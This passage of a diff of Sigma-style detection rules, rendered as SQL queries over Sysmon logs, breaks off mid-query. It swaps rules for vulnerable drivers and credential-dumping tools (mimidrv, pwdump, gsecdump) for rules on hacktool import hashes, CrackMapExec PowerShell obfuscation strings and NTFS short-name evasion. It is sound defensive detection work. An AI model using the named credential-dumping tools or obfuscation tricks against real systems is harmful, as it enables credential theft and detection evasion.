'\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d702d88b12233be9413446c445f22fda4a92a1d9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=910cb12aa49e9f35ecc4907e8304adf0dcca8cf1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4ed28fdfba7b8a8dfe39e591006f25d39990f07%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b0032b8d8e6f4bd19a31619ce38d8e010f29a816%' ESCAPE '\\' OR Hashes LIKE '%SHA1=db6245578ec57bd767b27ecf8085095e1c8e5a6e%' 